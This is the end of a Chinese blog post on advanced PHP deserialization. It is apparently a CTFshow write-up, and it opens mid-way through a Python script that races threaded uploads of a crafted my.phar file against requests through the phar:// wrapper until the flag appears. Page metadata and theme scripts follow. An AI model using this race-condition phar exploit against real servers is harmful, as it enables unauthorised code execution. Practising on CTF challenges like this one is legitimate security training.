class="hljs-string">&quot;rb&quot;</span>).read()<br>conent=readfile(<span class="hljs-string">&quot;my.phar&quot;</span>)<br><span class="hljs-comment"># print(conent)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">upload</span>():<br>    <span class="hljs-keyword">global</span> found_flag<br>    res.post(url=url+<span class="hljs-string">&quot;?fn=my.phar&quot;</span>,data=conent,verify=<span class="hljs-number">0</span>)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">read</span>():<br>    <span class="hljs-keyword">global</span> found_flag<br>    a=res.post(url=url+<span class="hljs-string">&quot;?fn=phar://my.phar/&quot;</span>,data=<span class="hljs-string">&quot;1&quot;</span>,verify=<span class="hljs-number">0</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;ctfshow&quot;</span> <span class="hljs-keyword">in</span> a.text <span class="hljs-keyword">and</span> found_flag==<span class="hljs-number">0</span> :<br>        <span class="hljs-built_in">print</span>(a.text)<br>        found_flag=<span class="hljs-number">1</span><br><span class="hljs-keyword">while</span> found_flag==<span class="hljs-number">0</span>:<br>    th.Thread(target=upload).start()<br>    th.Thread(target=read).start()<br></code></pre></td></tr></table></figure>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/web/" class="category-chain-item">web</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web/" class="print-no-link">#web</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>反序列化进阶</div>
      <div>http://fearless-123.github.io/2025/10/25/反序列化进阶/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>fearless123</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年10月25日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/10/25/%E6%B8%97%E9%80%8F/2022%E7%BD%91%E9%BC%8E%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B/" title="春秋云镜之2022网鼎杯半决赛">
                        <span class="hidden-mobile">春秋云镜之2022网鼎杯半决赛</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
